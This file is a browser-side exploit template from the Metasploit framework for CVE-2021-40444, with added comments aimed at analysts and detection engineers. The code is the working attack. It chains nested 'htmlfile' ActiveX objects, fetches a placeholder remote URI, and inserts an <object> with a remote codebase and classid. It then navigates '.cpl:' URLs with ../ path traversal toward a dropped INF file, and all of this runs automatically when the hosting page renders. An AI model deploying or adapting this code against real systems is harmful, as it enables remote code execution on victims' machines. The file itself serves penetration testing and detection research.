rapid7/metasploit-framework

data/exploits/CVE-2021-40444/cve_2021_40444.js

/**
 * Browser-side script template for CVE-2021-40444 (the CVE id comes from this
 * file's path in metasploit-framework).
 *
 * Reading notes for analysts and detection engineers:
 *  - "REPLACE_URI" and "REPLACE_INF" are literal placeholders in this file;
 *    presumably the module that serves the template substitutes real values
 *    before delivery (the substitution is not shown here).
 *  - Local names are obfuscator residue and do not describe their contents
 *    (`range` holds an iframe, `errors` holds the XMLHttpRequest constructor).
 *  - Every property access uses bracket notation with string keys, so a search
 *    for dotted forms such as `document.createElement` will not match this file.
 *  - `_0x4d7c02`, `newAttributes` and `fake` are assigned but never read here.
 *  - Stable strings worth matching on: ActiveXObject("htmlfile"), the `.cpl:`
 *    URL prefix combined with `../` segments, and an <object> element carrying
 *    both a remote `codebase` and a `classid`.
 *
 * Takes no parameters and returns nothing; all effects are side effects on the
 * hosting document and on the ActiveX objects it creates.
 */
function exploit() {
   // Cache DOM primitives from the prototypes and invoke them through .call().
   var x = window["document"];
   var then = window["Document"]["prototype"]["createElement"];
   var _0x4d7c02 = window["Document"]["prototype"]["write"];
   var PL$22 = window["HTMLElement"]["prototype"]["appendChild"];
   var opfilter = window["HTMLElement"]["prototype"]["removeChild"];
   // Create an iframe and attach it, falling back to <html> when appending to
   // document.body throws.
   var range = then["call"](x, "iframe");
   try {
     PL$22["call"](x["body"], range);
   } catch (errx) {
     PL$22["call"](x["documentElement"], range);
   }
   // Take the ActiveXObject constructor from the iframe's window, not the top-level one.
   var ACTIVEX = range["contentWindow"]["ActiveXObject"];
   var view = new ACTIVEX("htmlfile");
   range["contentDocument"]["open"]()["close"]();

   // Detach the iframe again; `view` was created while it was still attached.
   try {
     opfilter["call"](x["body"], range);
   } catch (err) {
     opfilter["call"](x["documentElement"], range);
   }
   // Build a chain of nested "htmlfile" documents: each new one is instantiated
   // through the Script.ActiveXObject of the previous one, then opened and closed.
   // NOTE(review): the nesting presumably moves the final document away from the
   // hosting page's security context - confirm against the vendor advisory.
   view["open"]()["close"]();
   var mappedObj = new (view["Script"]["ActiveXObject"])("htmlFile");
   mappedObj["open"]()["close"]();
   var TokenType = new (mappedObj["Script"]["ActiveXObject"])("htmlFile");
   TokenType["open"]()["close"]();
   var model = new (TokenType["Script"]["ActiveXObject"])("htmlFile");
   model["open"]()["close"]();
   // Six further "htmlfile" objects, created with the global ActiveXObject; five
   // of them are used for the navigation attempts at the end of the function.
   var iedom = new ActiveXObject("htmlfile");
   var rp_test = new ActiveXObject("htmlfile");
   var wmp_test = new ActiveXObject("htmlfile");
   var doc = new ActiveXObject("htmlfile");
   var a = new ActiveXObject("htmlfile");
   var fake = new ActiveXObject("htmlfile");
   // Synchronous GET of REPLACE_URI (`![]` is false, i.e. async = false). The
   // response is never read in this function, so the request matters only for
   // its side effect. Network telemetry sees one fetch of that URI from here.
   var errors = window["XMLHttpRequest"];
   var $node = new errors;
   var directiveProcessors = errors["prototype"]["open"];
   var nodeTypeRender = errors["prototype"]["send"];
   var newAttributes = window["setTimeout"];
   directiveProcessors["call"]($node, "GET", "REPLACE_URI", ![]);
   nodeTypeRender["call"]($node);
   // Inside the innermost htmlfile document, add an <object> whose codebase is
   // the same remote URI and whose classid is the fixed CLSID below. The
   // codebase/classid pair on a dynamically created <object> is a high-signal
   // indicator for content inspection.
   model["Script"]["document"]["write"]("<body>");
   var PL$41 = then["call"](model["Script"]["document"], "object");
   PL$41["setAttribute"]("codebase", "REPLACE_URI#version=5,0,0,0");
   PL$41["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
   PL$22["call"](model["Script"]["document"]["body"], PL$41);
   // Nine identical navigations to ".cpl:123" on the same object.
   // NOTE(review): the repetition looks like a delay/ordering device while the
   // <object> fetch completes - the file itself does not state the reason.
   iedom["Script"]["location"] = ".cpl:123";
   iedom["Script"]["location"] = ".cpl:123";
   iedom["Script"]["location"] = ".cpl:123";
   iedom["Script"]["location"] = ".cpl:123";
   iedom["Script"]["location"] = ".cpl:123";
   iedom["Script"]["location"] = ".cpl:123";
   iedom["Script"]["location"] = ".cpl:123";
   iedom["Script"]["location"] = ".cpl:123";
   iedom["Script"]["location"] = ".cpl:123";
   // Navigate to ".cpl:" URLs that address REPLACE_INF through several relative
   // paths (Temp and Temp/Low at different depths). Only the directory guess
   // differs between lines. Mitigation is the vendor fix for this CVE; for
   // detection, `.cpl:` followed by `../` in script content is the relevant
   // string, alongside endpoint telemetry for the document-handling process.
   iedom["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/Low/REPLACE_INF";
   rp_test["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/REPLACE_INF";
   wmp_test["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/Low/REPLACE_INF";
   doc["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/REPLACE_INF";
   a["Script"]["location"] = ".cpl:../../../../../Temp/Low/REPLACE_INF";
   doc["Script"]["location"] = ".cpl:../../../../../Temp/REPLACE_INF";
   doc["Script"]["location"] = ".cpl:../../Low/REPLACE_INF";
   doc["Script"]["location"] = ".cpl:../../REPLACE_INF";
}
// Invoked unconditionally at script evaluation: this file has no event handler,
// timer or user-interaction gate, so rendering the hosting page is enough to run it.
exploit();